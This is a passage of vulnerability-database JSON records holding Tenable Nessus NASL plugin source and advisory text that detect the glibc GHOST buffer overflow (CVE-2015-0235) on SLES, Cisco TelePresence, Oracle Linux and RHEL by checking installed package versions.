(rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"glibc-32bit-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.4-31.113.3\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.4-31.113.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:46:34", "description": "According to its self-reported version number, the Cisco TelePresence Conductor remote device is affected by a heap-based buffer overflow vulnerability in the GNU C Library (glibc) due to improperly validating user-supplied input to the __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2() functions. This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "cvss3": {"score": null, "vector": null}, "published": "2015-02-18T00:00:00", "type": "nessus", "title": "Cisco TelePresence Conductor GNU glibc gethostbyname Function Buffer Overflow Vulnerability (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:telepresence_conductor"], "id": "CISCO_TELEPRESENCE_CONDUCTOR_CSCUS69523.NASL", "href": "https://www.tenable.com/plugins/nessus/81407", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81407);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69523\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n\n script_name(english:\"Cisco TelePresence Conductor GNU glibc gethostbyname Function Buffer Overflow Vulnerability (GHOST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Cisco TelePresence Conductor device is affected by a buffer\noverflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Cisco TelePresence\nConductor remote device is affected by a heap-based buffer overflow\nvulnerability in the GNU C Library (glibc) due to improperly\nvalidating user-supplied input to the __nss_hostname_digits_dots(),\ngethostbyname(), and gethostbyname2() functions. This allows a remote\nattacker to cause a buffer overflow, resulting in a denial of service\ncondition or the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus69523\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.4 / 3.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:telepresence_conductor\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cisco_telepresence_conductor_detect.nbin\");\n script_require_keys(\"Host/Cisco_TelePresence_Conductor/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nprod = \"Cisco TelePresence Conductor\";\nversion = get_kb_item_or_exit(\"Host/Cisco_TelePresence_Conductor/Version\");\n\nif (\n version =~ \"^1(\\.|$)\" ||\n (version =~ \"^2\\.[0-3](\\.|$)\")\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed versions : 2.4 / 3.0' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, prod, version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:42:34", "description": "From Red Hat Security Advisory 2015:0090 :\n\nUpdated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2015-01-28T00:00:00", "type": "nessus", "title": "Oracle Linux 5 : glibc (ELSA-2015-0090) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:glibc", "p-cpe:/a:oracle:linux:glibc-common", "p-cpe:/a:oracle:linux:glibc-devel", "p-cpe:/a:oracle:linux:glibc-headers", "p-cpe:/a:oracle:linux:glibc-utils", "p-cpe:/a:oracle:linux:nscd", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2015-0090.NASL", "href": "https://www.tenable.com/plugins/nessus/81044", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2015:0090 and \n# Oracle Linux Security Advisory ELSA-2015-0090 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81044);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"RHSA\", value:\"2015:0090\");\n\n script_name(english:\"Oracle Linux 5 : glibc (ELSA-2015-0090) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2015:0090 :\n\nUpdated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2015-January/004811.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"glibc-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-common-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-devel-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-headers-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-utils-2.5-123.0.1.el5_11.1\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"nscd-2.5-123.0.1.el5_11.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-11T01:41:38", "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {"score": null, "vector": null}, "published": "2015-01-29T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-static", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:5.9", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.2", "cpe:/o:redhat:enterprise_linux:6.4", "cpe:/o:redhat:enterprise_linux:6.5"], "id": "REDHAT-RHSA-2015-0099.NASL", "href": "https://www.tenable.com/plugins/nessus/81068", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"1.22\");\n script_cvs_date(\"Date: 2019/10/24 15:35:39\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:0099\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-0235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5\\.6|5\\.9|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", 